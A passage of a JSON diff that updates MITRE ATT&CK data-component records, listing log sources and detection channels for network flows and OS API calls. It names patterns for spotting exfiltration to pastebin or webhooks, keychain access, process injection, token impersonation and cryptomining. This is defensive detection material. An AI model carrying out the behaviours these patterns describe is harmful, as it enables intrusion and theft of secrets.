+                            "channel": "First-time outbound connections to package registries or unknown hosts immediately after restore/build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to new registries/CDNs post-install/build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to non-approved registries after dependency install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connections to TCP 139,445 and HTTP/HTTPS to WebDAV endpoints from workstation subnets"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large outbound data flows or long-duration connections"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "egress > 90th percentile or frequent connection reuse"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "esxcli network vswitch or DNS resolver configuration updates"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "Network Events"
+                        },
+                        {
+                            "name": "iptables:LOG",
+                            "channel": "TCP connections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection metadata"
+                        },
+                        {
+                            "name": "wineventlog:dhcp",
+                            "channel": "DHCP Lease Granted"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LEASE_GRANTED"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "MAC not in allow-list acquiring IP (DHCP)"
+                        },
+                        {
+                            "name": "Windows Firewall Log",
+                            "channel": "SMB over high port"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Internal connection logging"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "pf firewall logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inter-segment traffic"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Long-lived or hijacked SSH sessions maintained with no active user activity"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "VPC/NSG flow logs for pod/instance egress to Internet or metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious outbound traffic from browser binary to non-standard domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abnormal browser traffic volume or destination"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound requests to domains not previously resolved or associated with phishing campaigns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to domains/IPs not previously resolved, occurring shortly after attachment download or link click"
+                        },
+                        {
+                            "name": "M365Defender:DeviceNetworkEvents",
+                            "channel": "NetworkConnection: bytes_sent >> bytes_received anomaly"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "outbound flows with bytes_out >> bytes_in"
+                        },
+                        {
+                            "name": "NSX:FlowLogs",
+                            "channel": "network_flow: bytes_out >> bytes_in to external"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/Zeek conn.log"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound data flows"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow records with entropy signatures resembling symmetric encryption"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "flow records"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "flow records"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTPS POST to known webhook URLs"
+                        },
+                        {
+                            "name": "saas:api",
+                            "channel": "Webhook registrations or repeated POST activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Source/destination IP translation inconsistent with intended policy"
+                        },
+                        {
+                            "name": "SNMP:DeviceLogs",
+                            "channel": "Unexpected NAT translation statistics or rule insertion events"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sudden spike in incoming flows to web service ports from single/multiple IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Unusual volume of inbound packets from single source across short time interval"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "port 5900 inbound"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP port 5900 open"
+                        },
+                        {
+                            "name": "NSM:firewall",
+                            "channel": "inbound connection to port 5900"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound connections to 139/445 to multiple destinations"
+                        },
+                        {
+                            "name": "VPCFlowLogs:All",
+                            "channel": "High volume internal traffic with low entropy indicating looped or malicious DoS script"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/sFlow/PCAP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound Network Flow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.network"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Device-to-Device Deployment Flows"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect syscalls"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound TCP/UDP traffic over unexpected port"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi service connections on unexpected ports"
+                        },
+                        {
+                            "name": "iptables:LOG",
+                            "channel": "OUTBOUND"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "tcp/udp"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "CLI network calls"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic from suspicious new processes post-attachment execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious anomalies in transmitted data integrity during application network operations"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "DNS resolution events leading to outbound traffic on unexpected ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to mining pools or proxies"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound flow logs to known mining pools"
+                        },
+                        {
+                            "name": "container:cni",
+                            "channel": "Outbound network traffic to mining proxies"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "TLS session established by ESXi service to unapproved endpoint"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session records with TLS-like byte patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTPS POST requests to pastebin.com or similar"
+                        },
+                        {
+                            "name": "NetFlow:Flow",
+                            "channel": "new outbound connections from exploited process tree"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "new connections from exploited lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected route changes or duplicate gateway advertisements"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall",
+                            "channel": "EventCode=2004, 2005, 2006"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Knock pattern: repeated REJ/S0 across \u2265MinSequenceLen ports from same src_ip then SF success."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Firewall/PF anchor load or rule change events."
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config/ACL changes, line vty transport input changes, telnet/ssh/http(s) enable, image/feature module changes."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to non-approved update hosts right after install/update"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New outbound flows to non-approved vendor hosts post install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New/rare egress to non-approved update hosts after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large outbound HTTPS uploads to repo domains"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS traffic to repository domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "alert log"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound flow records"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "NetworkConnection: high out:in ratio, periodic beacons, protocol mismatch"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "high out:in ratio or fixed-size periodic flows"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "network_flow: bytes_out >> bytes_in, fixed packet sizes/intervals to non-approved CIDRs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect or sendto system call with burst pattern"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "sudden burst in outgoing packets from same PID"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "source instance sends large volume of traffic in short window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "session stats with bytes_out > bytes_in"
+                        },
+                        {
+                            "name": "NIDS:Flow",
+                            "channel": "session stats with bytes_out > bytes_in"
+                        },
+                        {
+                            "name": "esxi:vpxa",
+                            "channel": "connection attempts and data transmission logs"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "External traffic to remote access services"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High volumes of SYN/ACK packets with unacknowledged TCP handshakes"
+                        },
+                        {
+                            "name": "dns:query",
+                            "channel": "Outbound resolution to hidden service domains (e.g., `.onion`)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log + ssl.log with Tor fingerprinting"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "forwarded encrypted traffic"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Relayed session pathing (multi-hop)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound TCP SYN or UDP to multiple ports/hosts"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "container-level outbound traffic events"
+                        },
+                        {
+                            "name": "WLANLogs:Association",
+                            "channel": "Multiple APs advertising the same SSID but with different BSSID/MAC or encryption type"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "socket_events"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "ARP cache modification attempts observed through event tracing or security baselines"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Gratuitous ARP replies with mismatched IP-MAC binding"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ARP table updates inconsistent with expected gateway or DHCP lease assignments"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "networkd or com.apple.network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream 'eventMessage contains \"dns_request\"'"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "/var/log/syslog.log"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "CreateTrafficMirrorSession or ModifyTrafficMirrorTarget"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config change: CLI/NETCONF/SNMP \u2013 'monitor session', 'mirror port'"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound UDP floods targeting common reflection services with spoofed IP headers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound UDP spikes to external reflector IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large outbound UDP traffic to multiple public reflector IPs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "High entropy domain queries with multiple NXDOMAINs"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Frequent DNS queries with high entropy names or NXDOMAIN results"
+                        },
+                        {
+                            "name": "vpxd.log",
+                            "channel": "API communication"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound Connection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connection Tracking"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "pf firewall logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow Creation (NetFlow/sFlow)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, icmp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abnormal SMB authentication attempts correlated with poisoned LLMNR/NBT-NS sessions"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Gratuitous or duplicate DHCP OFFER packets from non-legitimate servers"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Inbound on ports 5985/5986"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Multiple IP addresses assigned to the same domain in rapid sequence"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Rapid domain-to-IP resolution changes for same domain"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Frequent DNS resolution of same domain with rotating IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "uncommon ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "alternate ports"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log or flow data"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "egress log analysis"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "egress logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High volume flows with incomplete TCP sessions or single-packet bursts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Knock pattern: multiple REJ/S0 to distinct closed ports then successful connection to service_port"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Firewall rule enable/disable or listen socket changes"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config/ACL/line vty changes, service enable (telnet/ssh/http(s)), module reloads"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ioctl: Changes to wireless network interfaces (up, down, reassociate)"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: Historical list of associated SSIDs compared against baseline"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress from host after new install to unknown update endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to unknown registries/mirrors immediately after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress from app just installed to unknown update endpoints"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi processes relaying traffic via SSH or unexpected ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connection to mining pool port (3333, 4444, 5555)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to mining pool upon container launch"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow records with RSA key exchange on unexpected port"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connections from web server binaries (apache2, nginx, php-fpm) to unknown external IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "sustained outbound HTTPS sessions with high data volume"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections from IDE hosts to marketplace/tunnel domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound connections from IDE processes to marketplace/tunnel domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS outbound uploads"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network flows to external cloud services"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP port 22 traffic"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "port 22 access"
+                        },
+                        {
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
+                        },
+                        {
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.777000+00:00\", \"old_value\": \"2026-04-09 17:32:30.362000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0078\", \"old_value\": \"https://attack.mitre.org/data-components/DC0078\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0021",
+                            "external_id": "DC0021"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "OS API Execution",
+                    "description": "Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Base",
+                            "channel": "GetLocaleInfoW, GetTimeZoneInformation API calls"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetMetadata, DescribeInstanceIdentity"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "open, execve: Unexpected processes accessing or modifying critical files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, ioctl"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API tracing / stack tracing via ETW or telemetry-based EDR"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "Behavioral API telemetry (GetProcAddress, LoadLibrary, VirtualAlloc)"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "aaa privilege_exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "APCQueueOperations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Invocation of SMLoginItemSetEnabled by non-system or recently installed application"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "flock|NSDistributedLock|FileHandle.*lockForWriting"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Directory-Services-SAM",
+                            "channel": "api_call: Calls to DsAddSidHistory or related RPC operations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "application logs referencing NSTimer, sleep, or launchd delays"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "High-frequency or suspicious sequence of QueryPerformanceCounter/GetTickCount API calls from a non-standard process lineage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Rules capturing clock_gettime, time, gettimeofday syscalls when enabled"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Unexpected reload, crashinfo, or boot message not tied to scheduled maintenance"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-RPC",
+                            "channel": "rpc_call: srvsvc.NetShareEnum / NetShareEnumAll from non-admin or unusual processes"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smb_command: TreeConnectAndX to \\\\*\\IPC$ / srvsvc or Trans2/NT_CREATE for listing shares"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "API usage MFCreateDeviceSource, IAMStreamConfig, ICaptureGraphBuilder2, DirectShow filter graph creation from uncommon callers"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat/read/ioctl: openat/read/ioctl on /dev/video* by uncommon user/process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access decisions to kTCCServiceCamera for unexpected binaries"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "Objective\u2011C/Swift calls to AVCaptureDevice/AVCaptureSession by non-whitelisted processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mmap, ptrace, process_vm_writev or direct memory ops"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "API call to AddMonitor invoked by non-installer process"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Win32k",
+                            "channel": "SetWindowLong, SetClassLong, NtUserMessageCall, SendNotifyMessage, PostMessage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unshare, mount, keyctl, setns syscalls executed by containerized processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "audio APIs"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-COM/Operational",
+                            "channel": "CLSID activation events where ProcessName=mmc.exe and CLSID not in allowed baseline"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.securityd, com.apple.tccd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "send, recv, write: Abnormal interception or alteration of transmitted data"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CALCULATE: Integrity validation of transmitted data via hash checks"
+                        },
+                        {
+                            "name": "ETW:Token",
+                            "channel": "token_analysis: API calls such as DuplicateTokenEx or ImpersonateLoggedOnUser"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API Calls"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-DotNETRuntime",
+                            "channel": "AssemblyLoad/ModuleLoad (Loader keyword) from Microsoft-Windows-DotNETRuntime"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "VirtualAlloc/VirtualProtect/MapViewOfFile indicators via stack/heap activity and ImageLoad"
+                        },
+                        {
+                            "name": "auditd:MMAP",
+                            "channel": "memory region with RWX permissions allocated"
+                        },
+                        {
+                            "name": "snmp:trap",
+                            "channel": "management queries"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "Describe* or List* API calls"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Win32k",
+                            "channel": "SendMessage, PostMessage, LVM_*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sudo or pkexec invocation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "authorization execute privilege requests"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "NtQueryInformationProcess"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ptrace: Processes invoking ptrace with PTRACE_TRACEME flag"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Remote access API calls and file uploads"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Execution of modified binaries or abnormal library load sequences"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Calls to AuthorizationExecuteWithPrivileges() observed via Apple System Logger or security_auditing tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access or unlock attempt to keychain database"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of input detection APIs (e.g., CGEventSourceKeyState)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mount system call with bind or remap flags"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "Decrypt"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-File",
+                            "channel": "ZwSetEaFile or ZwQueryEaFile function calls"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "fork/clone/daemon syscall tracing"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Detached process execution with no associated parent"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, mmap, mprotect, open, dlopen"
+                        },
+                        {
+                            "name": "ETW:ProcThread",
+                            "channel": "api_call: CreateProcessWithTokenW, CreateProcessAsUserW"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "MemoryWriteToExecutable"
+                        },
+                        {
+                            "name": "ETW:Token",
+                            "channel": "api_call: DuplicateTokenEx, ImpersonateLoggedOnUser, SetThreadToken"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "api_call: UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) and CreateProcess* with EXTENDED_STARTUPINFO_PRESENT / StartupInfoEx"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Security-Auditing",
+                            "channel": "api_call: LogonUser(A|W), LsaLogonUser, SetThreadToken, ImpersonateLoggedOnUser"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API calls"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, mmap, process_vm_writev"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of dd or sed targeting /proc/*/mem"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "CreateTransaction, CreateFileTransacted, RollbackTransaction, NtCreateProcessEx, NtCreateThreadEx"
+                        },
+                        {
+                            "name": "ETW",
+                            "channel": "Calls to GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "WriteProcessMemory: WriteProcessMemory targeting regions containing KernelCallbackTable addresses"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "SetFileTime"
+                        },
+                        {
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
